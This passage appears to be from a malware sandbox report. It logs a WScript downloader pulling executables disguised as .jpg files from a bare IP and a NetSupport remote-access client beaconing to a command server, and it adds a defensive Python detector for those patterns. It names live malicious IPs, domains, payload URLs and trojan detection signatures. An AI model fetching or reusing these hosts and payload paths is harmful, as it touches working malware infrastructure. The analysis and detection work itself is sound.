3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/4.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/5.jpg | unknown | html | suspicious
2268 | client32.exe | POST | –– | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | binary | –– | –– | suspicious

Download the PCAP, analyze network streams, HTTP content and a lot more in the full report

Connections

PID Process IP ASN CN Reputation
3556 iexplore.exe 185.206.213.173:443 LeaseWeb Netherlands B.V. NL unknown
3076 iexplore.exe 204.79.197.200:80 Microsoft Corporation US whitelisted
3556 iexplore.exe 88.99.66.31:443 Hetzner Online GmbH DE suspicious
3076 iexplore.exe 185.206.213.173:443 LeaseWeb Netherlands B.V. NL unknown
3872 powershell.exe 185.206.213.173:443 LeaseWeb Netherlands B.V. NL unknown
2432 WScript.exe 88.99.66.31:443 Hetzner Online GmbH DE suspicious
2432 WScript.exe 45.12.215.157:80 –– suspicious
3620 WScript.exe 45.12.215.157:80 –– suspicious
3896 temp69.exe 185.212.130.9:443 Virtual Trade Ltd NL malicious
2268 client32.exe 5.45.73.63:4151 Serverius Holding B.V. NL suspicious
2268 client32.exe 195.171.92.116:80 British Telecommunications PLC GB unknown

DNS requests

Domain | IP | Reputation
radiobox-online.org | 185.206.213.173 | unknown
www.bing.com | 204.79.197.200, 13.107.21.200 | whitelisted
2no.co | 88.99.66.31 | malicious
avheaven.icu | 185.212.130.9 | malicious
geo.netsupportsoftware.com | 195.171.92.116, 62.172.138.35 | malicious

Threats

PID Process Class Message
3556 iexplore.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
3556 iexplore.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
2432 WScript.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
2432 WScript.exe Potential Corporate Privacy Violation POLICY [PTsecurity] IP Check Domain SSL certificate
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3620 WScript.exe A Network Trojan was detected ET TROJAN JS/WSF Downloader Dec 08 2016 M4
3620 WScript.exe Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3620 WScript.exe Misc activity SUSPICIOUS [PTsecurity] PE as Image Content type mismatch
3620 WScript.exe A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
–– –– Potentially Bad Traffic ET INFO DNS Query for Suspicious .icu Domain
3896 temp69.exe Potentially Bad Traffic ET INFO Suspicious Domain (*.icu) in TLS SNI
3896 temp69.exe Potentially Bad Traffic ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.icu)
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin
2268 client32.exe A Network Trojan was detected SUSPICIOUS [PTsecurity] NetSupport Remote Admin

9 ETPRO signatures available in the full report
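Three of the behaviours the signatures above fired on can be reproduced from proxy or sandbox HTTP logs without the IDS: a script host pulling a PE (MZ header) from a bare-IP URL under an image name, the NetSupport client POSTing to /fakeurl.htm on a non-standard port, and the geo.netsupportsoftware.com location lookup. The following is an added example for this page, not ANY.RUN's, Emerging Threats' or PTsecurity's rule logic. The pipe-delimited log format (pid|process|method|status|dst|url|magic) is constructed for the example; the sample lines carry the values from the HTTP requests table, and the magic column (first two response bytes in hex, empty when not captured) is an assumption standing in for the sandbox's "MZ Response" check.

```python
"""Flag the HTTP behaviours this report's signatures matched, from log lines.

Added example, not sandbox or IDS code. Log format and the 'magic' column are
constructed; URLs, hosts, ports and process names come from the report.
"""
import ipaddress
from dataclasses import dataclass
from urllib.parse import urlsplit

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".ico")
PE_MAGIC = "4D5A"                         # "MZ"
NETSUPPORT_GATEWAY_PATH = "/fakeurl.htm"  # path client32.exe POSTs to in this report
NETSUPPORT_GEO_HOST = "geo.netsupportsoftware.com"


@dataclass(frozen=True)
class HttpEvent:
    pid: int
    process: str
    method: str
    status: str
    dst: str      # "ip:port" the request went to
    url: str
    magic: str    # first two response bytes as hex, "" if not captured


def parse_line(line: str) -> HttpEvent:
    pid, process, method, status, dst, url, magic = line.split("|")
    return HttpEvent(int(pid), process, method, status, dst, url, magic.strip())


def is_bare_ip(host: str) -> bool:
    """True when the URL host is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(ev: HttpEvent) -> list[str]:
    """Return the rule names the event matches (empty when nothing matched)."""
    parts = urlsplit(ev.url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    port = int(ev.dst.rsplit(":", 1)[1])
    hits = []

    # Script host fetching a PE from a dotted-quad URL ("Likely Evil EXE
    # download from dotted Quad by MSXMLHTTP"), optionally disguised as an
    # image ("PE as Image Content type mismatch").
    if (ev.process.lower() in SCRIPT_HOSTS and is_bare_ip(host)
            and ev.magic.upper() == PE_MAGIC):
        hits.append("pe_download_from_bare_ip_by_script_host")
        if path.endswith(IMAGE_EXT):
            hits.append("pe_served_with_image_extension")

    # NetSupport HTTP transport: POST /fakeurl.htm to a bare IP on a port
    # other than 80/443 (here 5.45.73.63:4151).
    if (ev.method == "POST" and path == NETSUPPORT_GATEWAY_PATH
            and is_bare_ip(host) and port not in (80, 443)):
        hits.append("netsupport_gateway_beacon")

    # The client's geolocation lookup against the vendor service.
    if host == NETSUPPORT_GEO_HOST:
        hits.append("netsupport_geo_lookup")
    return hits


def scan(log_text: str) -> list[tuple[int, str, list[str]]]:
    """(pid, url, rules) for every line that matched at least one rule."""
    out = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        rules = classify(ev)
        if rules:
            out.append((ev.pid, ev.url, rules))
    return out


# Constructed log: one line per HTTP request from the table above; the
# trailing magic field is assumed (4D5A only where the sandbox saw an MZ body).
SAMPLE_LOG = """\
3076|iexplore.exe|GET|200|204.79.197.200:80|http://www.bing.com/favicon.ico|0000
2432|WScript.exe|GET|200|45.12.215.157:80|http://45.12.215.157/src/load2.jpg|
3620|WScript.exe|GET|200|45.12.215.157:80|http://45.12.215.157/images/1.jpg|4D5A
3620|WScript.exe|GET|404|45.12.215.157:80|http://45.12.215.157/images/2.jpg|
2268|client32.exe|POST|200|5.45.73.63:4151|http://5.45.73.63/fakeurl.htm|
2268|client32.exe|GET|200|195.171.92.116:80|http://geo.netsupportsoftware.com/location/loca.asp|
"""

if __name__ == "__main__":
    for pid, url, rules in scan(SAMPLE_LOG):
        print(pid, url, ", ".join(rules))
```

The load2.jpg fetch by PID 2432 is deliberately left unflagged: it came back as text (the VBS stage), so a rule keyed on the MZ header rather than on the image extension alone does not fire, which is the same distinction the sandbox's signatures made between the two WScript downloads.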

Debug output strings

Process Message
client32.exe Assert, tid=93c, tid=93c
client32.exe Assert, tid=93c, tid=93c
client32.exe Assert, tid=93c, tid=93c